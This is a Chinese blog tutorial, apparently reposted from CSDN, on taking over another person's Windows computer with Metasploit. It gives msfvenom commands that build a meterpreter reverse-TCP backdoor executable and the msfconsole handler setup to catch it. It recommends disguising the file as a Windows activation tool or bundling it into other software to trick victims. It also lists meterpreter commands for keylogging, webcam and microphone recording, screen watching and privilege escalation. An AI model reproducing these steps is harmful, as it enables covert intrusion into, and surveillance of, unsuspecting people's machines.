怎么样渗透别人的电脑(Kali利用msf渗透Windows电脑（超详细）)

前言

最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题，想要的可以私信自取，无偿赠送给粉丝朋友~

一、什么是msf

msfvenomaMetasploitstandalonepayloadgenerator，Alsoareplacementformsfpayloadandmsfencode.是用来生成后门的软件。

MSFvenom是Msfpayload和Msfencode的组合，将这两个工具都放在一个Framework实例中。自2015年6月8日起，msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali2021.3进行演示操作

目标靶机：Win10专业版

软件：msfvenom、msfconsole（Kali系统内置）

二、渗透流程

1.进入管理员模式

命令：sudosu

解释：不在管理员模式下运行可能会有权限不够的提示，为了避免命令执行失败，在管理员下运行以下命令

2.生成可执行文件

命令：msfvenom-pwindows/meterpreter/reverse_tcpLHOST=<本地ip>LPORT=<本地端口号>–fexe–o<文件名>.exe

解释：本地ip写自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号，如果端口号被占用那么文件会生成失败，换一个端口号就性

文件名可以随便写自己喜欢的名字，比如写Win10激活工具，可能更容易让目标主机上钩

当然MSF也可以用来渗透手机、mac、Linux等

接下来运行命令生成文件

默认生成的文件在根目录下

把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令：msfconsole

4.配置参数

(1)命令：useexploit/multi/handler（选择模块）

(2)命令：setpayloadwindows/meterpreter/reverse_tcp（选择攻击模块）

(3)命令：setLhOST192.168.32.1（填写自己主机的IP地址）

(4)命令：setlport1111（填写刚才生成文件时的端口号）

(5)命令：showoptions（查看设置参数）

(6)命令：exploit-z-j（后台执行）

5.在靶机打开可执行文件

我们这里也可以把这个程序伪装一下，把他的图标改一下，或者把它捆绑在某些软件上面，当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令：sessions（查看上钩的用户）

(2)命令：sessions-i1（选择需要攻击的用户，这里选择第1个

三、meterpreter渗透靶机的命令1.监控靶机电脑屏幕

命令：runvnc-i

2.更多命令

cmd指令:

cat读取文件内容到屏幕

cd更改目录

checksum检索文件的校验和

cp将源复制到目标

del删除指定文件

dir列出文件（ls的别名）

下载下载文件或目录

编辑编辑文件

getlwd打印本地工作目录

getwd打印工作目录

lcd更改本地工作目录

lls列出本地文件

lpwd打印本地工作目录

ls列出文件

mkdir创建目录

mv将源移动到目标

pwd打印工作目录

rm删除指定文件

rmdir删除目录

search搜索文件

show_mount列出所有挂载点/逻辑驱动器

upload上传文件或目录

pkill按名称终止进程

meterpreter命令：

keyscan_start开始捕获击键（开始键盘记录）

keyscan_dump转储按键缓冲（下载键盘记录）

keyscan_stop停止捕获击键（停止键盘记录）

record_micX秒从默认的麦克风record_mic音频记录（音频录制）

webcam_chat开始视频聊天（视频，对方会有弹窗）

webcam_list单摄像头（查看摄像头列表）

webcam_snap采取快照从指定的摄像头（摄像头拍摄一张照片）

webcam_stream播放视频流从指定的摄像头（开启摄像头监控）

enumdesktops列出所有可访问的桌面和窗口站（窗体列表）

getdesktop得到当前的Meterpreter桌面

reboot重新启动远程计算机

shutdown关闭远程计算机

shell放入系统命令shell

enumdesktops列出所有可访问的桌面和窗口站

getdesktop获取当前的meterpreter桌面

idletime返回远程用户空闲的秒数

keyboard_send发送击键

keyevent发送按键事件

keyscan_dump转储击键缓冲区

keyscan_start开始捕获击键

keyscan_stop停止捕获击键

mouse发送鼠标事件

screenshare实时观看远程用户桌面

screenshot抓取交互式桌面的屏幕截图

setdesktop更改Meterpreters当前桌面

uictl控制一些用户界面组件

record_mic从默认麦克风录制音频X秒

webcam_chat开始视频聊天

webcam_list列出网络摄像头

webcam_snap从指定的网络摄像头拍摄快照

webcam_stream播放来自指定网络摄像头的视频流

play在目标系统上播放波形音频文件(.wav)

getsystem尝试将您的权限提升到本地系统的权限

execute-fnotepad打开记事本

————————————————

版权声明：本文为CSDN博主「HonkerG」的原创文章

原文链接：https://blog.csdn.net/RFZ_322/article/details/123367668